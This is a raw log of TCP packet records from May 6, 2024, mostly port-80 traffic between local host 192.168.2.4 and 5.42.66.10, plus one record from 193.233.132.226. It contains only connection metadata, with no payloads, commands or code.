May 6, 2024 07:53:04.529002905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529012918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529015064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529025078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529036999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529050112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529055119 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529061079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529072046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529077053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529084921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529097080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529103041 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529109001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529120922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529126883 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529145002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529162884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529179096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529191971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529201031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529212952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529225111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529226065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529237032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529247999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529254913 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529259920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529270887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529270887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529284000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529290915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529297113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529309034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529314995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529340029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529351950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529417992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529429913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529441118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529452085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529463053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529464006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529474020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529474974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529485941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529499054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529510021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529511929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529524088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529530048 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529535055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529547930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529560089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529566050 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529572010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529582977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529594898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529597044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529606104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529614925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529618025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529633045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529650927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529679060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529696941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529710054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529721022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529732943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529736042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529747963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529758930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529762030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529778957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529787064 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529789925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529802084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529808044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529813051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529824972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529834986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529839993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529850960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529861927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529870987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529874086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529889107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529889107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529901981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529907942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529913902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529925108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529933929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529937029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529947996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529959917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.529964924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.529985905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530004978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530011892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530025005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530035019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530049086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530057907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530061960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530070066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530103922 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530169010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530180931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530193090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530203104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530208111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530215025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530225992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530237913 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530240059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530251980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530263901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530270100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530276060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530287981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530293941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530301094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530313015 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530313969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530327082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530354023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530359983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530368090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530380011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530390978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530392885 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530402899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530415058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530424118 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530426979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530452013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530473948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530476093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530488968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530498028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530508995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530518055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530520916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530533075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530538082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530566931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530576944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530589104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530600071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530611992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530622959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530627012 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530635118 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530636072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530647039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530658007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530668974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530670881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530683041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530694962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530704975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530706882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530718088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530724049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530750036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530752897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530762911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530772924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530783892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530792952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530795097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530807018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530822992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530823946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530833960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530853033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530874014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530925989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530936956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530947924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530958891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530967951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530971050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530982971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.530987024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.530993938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.531003952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.531017065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.531017065 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.531028986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.531040907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.531048059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.531053066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.531064034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.531069994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.531075001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.531086922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.531090975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.531099081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.531111002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.531111002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.531121969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.531125069 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.531135082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.531147957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.531158924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.531162024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.531191111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.531193972 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.531204939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.531207085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.531239986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.542944908 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.543241024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.630753994 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:04.766555071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.766606092 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.766911983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.766923904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.766936064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.766951084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.766954899 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.766963959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.766976118 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.766977072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767004967 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767019033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767271042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767282009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767292976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767303944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767309904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767316103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767323971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767328024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767340899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767353058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767353058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767364025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767369986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767376900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767389059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767395973 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767400980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767410994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767422915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767436028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767441034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767448902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767460108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767467022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767472029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767482996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767484903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767497063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767508030 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767508984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767518997 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767523050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767534018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767545938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767545938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767558098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767570019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767575026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767591953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767616034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767642975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767657042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767667055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767680883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767684937 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767693996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767704964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767709970 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767715931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767728090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767739058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767740011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767749071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767750978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767781019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767807961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.767833948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.767873049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768026114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768038988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768068075 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768076897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768157005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768168926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768178940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768189907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768201113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768202066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768209934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768213034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768232107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768239975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768244982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768256903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768261909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768268108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768279076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768289089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768291950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768304110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768315077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768316984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768328905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768336058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768342018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768348932 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768353939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768366098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768377066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768378019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768397093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768424034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768435001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768476009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768639088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768650055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768681049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768691063 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768805981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768817902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768829107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768841028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768843889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768851995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768857002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768863916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768874884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768882990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768886089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768898964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768910885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768913031 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768923044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768929958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768954039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.768955946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.768985987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769004107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769184113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769195080 CEST	80	49741	5.42.66.10	192.168.2.4
